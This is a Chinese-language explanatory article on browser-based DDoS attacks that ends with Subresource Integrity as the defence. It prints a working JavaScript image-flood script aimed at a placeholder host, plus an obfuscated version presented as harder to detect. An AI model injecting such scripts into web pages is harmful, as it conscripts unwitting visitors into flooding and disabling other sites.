基于JavaScript的DDOS攻擊是怎樣的

這篇文章給大家介紹基于JavaScript的DDOS攻擊是怎樣的，內容非常詳細，感興趣的小伙伴們可以參考借鑒，希望對大家能有所幫助。

最古老、最普遍、卻又最可怕的攻擊非DDoS攻擊莫屬。

在傳統的DDoS攻擊中，攻擊者會控制大量的傀儡機，然后向目標服務器發送大量請求，阻止合法用戶訪問網站。

然而，最近幾年DDoS攻擊技術不斷推陳出新：攻擊者用一種新型且很有趣的方式欺騙用戶參與到攻擊活動中：使用惡意的JavaScript欺騙用戶參與DDoS攻擊。

基于JavaScript的DDOS攻擊有一個非比尋常的特點：任何有瀏覽器的設備都可能參與攻擊，其潛在攻擊規模接近無限。

基于JavaScript的DDOS攻擊原理

現代網站的交互作用大多數都是采用JavaScript。JavaScript腳本可直接注入HTML中，或者通過 <script src=""> HTML從遠程服務器載入。

function imgflood() {var TARGET = ''victim-website.com'var URI = '/index.php?'var pic = new Image()var rand = Math.floor(Math.random() * 1000)pic.src = 'http://'+TARGET+URI+rand+'=val'}setInterval(imgflood, 10)

該腳本會在目標網頁上生成一個圖片按鈕，圖片按鈕會指向“'victim-website.com” 網站。只要用戶訪問了含有該腳本的網頁，那么他就會成為 “'victim-website.com”DDoS攻擊中的一員。瀏覽器發出的每一個請求都是有效請求，于是該攻擊又變成了Layer 7 攻擊。

由于是JS代碼，所以通過查看網頁源碼，可以直接的看到攻擊代碼，發現是攻擊網頁。但如果以上的代碼經過JShaman的混淆，JS代碼會被保護起來，更難以被識別和發現：

var _0x9ea1=['victim\\x2dwebsite\\x2ecom','\\x2findex\\x2ephp\\x3f','floor','random','src','http\\x3a\\x2f\\x2f','\\x3dval'];(function(_0xa439d7,_0x7a3f17){var _0x2fcd4b=function(_0x1be501){while(--_0x1be501){_0xa439d7['\\x70\\x75\\x73\\x68'](_0xa439d7['\\x73\\x68\\x69\\x66\\x74']());}};_0x2fcd4b(++_0x7a3f17);}(_0x9ea1,0xa1));var _0x19ea=function(_0x3ac308,_0x2c1ecf){_0x3ac308=_0x3ac308-0x0;var _0x393163=_0x9ea1[_0x3ac308];return _0x393163;};function imgflood(){var _0xcb2cd4=_0x19ea('0x0');var _0x3d1bbb=_0x19ea('0x1');var _0x189885=new Image();var _0x2dfc3a=Math[_0x19ea('0x2')](Math[_0x19ea('0x3')]()*0x3e8);_0x189885[_0x19ea('0x4')]=_0x19ea('0x5')+_0xcb2cd4+_0x3d1bbb+_0x2dfc3a+_0x19ea('0x6');}setInterval(imgflood,0xa);

如果攻擊者入侵了一個網站，在網站js文件中嵌入了類似上面的惡意JavaScript腳本，那么該網站的每一個訪客都將成為DDoS攻擊中的一員。網站流量越高就意味著DDoS越嚴重。

如何防止這種攻擊？

目前HTTP還沒有相關的機制來阻止該腳本的運行，但W3C已經提出了名叫子資源完整性（SRI）的新功能，使用加密哈希值驗證腳本，如果哈希值不匹配瀏覽器可以阻止其運行。

例如，如下腳本標簽：

<script src="https://code.jquery.com/jquery-1.10.2.min.js">

瀏覽器會自動下載該.js文件，并且會不分青紅皂白的運行它。即使該文件中被攻擊者注入了惡意腳本，瀏覽器也不會識別（也識別不出）。然而如果網站發現了哈希值驗證腳本不匹配，子資源完整性（SRI）會告訴瀏覽器不要運行該腳本。

<script src="https://code.jquery.com/jquery-1.10.2.min.js"integrity="sha256-C6CB9UYIS9UJeqinPHWTHVqh/E1uhG5Twh+Y5qFQmYg="crossorigin="anonymous">

建議網站管理員將添加這一標簽添加到服務器上，用以保護其用戶不被利用。

關于基于JavaScript的DDOS攻擊是怎樣的就分享到這里了，希望以上內容可以對大家有一定的幫助，可以學到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。